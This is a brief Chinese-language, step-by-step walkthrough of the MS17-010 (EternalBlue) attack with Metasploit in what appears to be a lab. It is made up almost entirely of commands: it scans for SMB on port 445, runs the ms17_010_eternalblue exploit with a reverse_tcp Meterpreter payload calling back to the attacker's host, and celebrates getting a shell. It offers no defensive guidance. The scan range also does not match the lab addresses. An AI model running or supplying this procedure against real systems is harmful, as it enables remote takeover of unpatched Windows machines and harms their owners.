ms17-010-永恒之蓝漏洞

攻击机：192.168.11.231

被攻击机：192.168.11.22

第一步：更新MSF:msfupdate，查找smb_ms17_010.rb模块

cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb

第二步：连接postgresql数据库，不连接的话扫描的信息的信息无法入库。连接上后可通过db_status查看状态

启动数据库：service postgresql start

启动msfconsole：msfconsole

使用db_status确认数据库是否正确连接

第三步：运行smb模块探测主机445端口开放情况。

use auxiliary/scanner/smb/smb_version

set rhosts 192.168.236.129/24

set threads 16

run

扫描完成后，扫描的信息会自动存入数据库，可通过hosts命令查看

第四步：使用smb_ms17_010模块探测MS17-010漏洞

use auxiliary/scanner/smb/smb_ms17_010

show options

services -r tcp -p 445 -R

扫描之前可通过info查看配置详情

第五步：使用攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置目标系统的IP和payload。

set RHOST 192.168.11.22

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.11.231

exploit执行攻击，成功返回会话。

第六步：坐等结果

meterpreter> sysinfo

meterpreter> getuid

MS17-010扫描模块截图

MS17-010攻击模块截图

攻击成功，得到SHELL！！！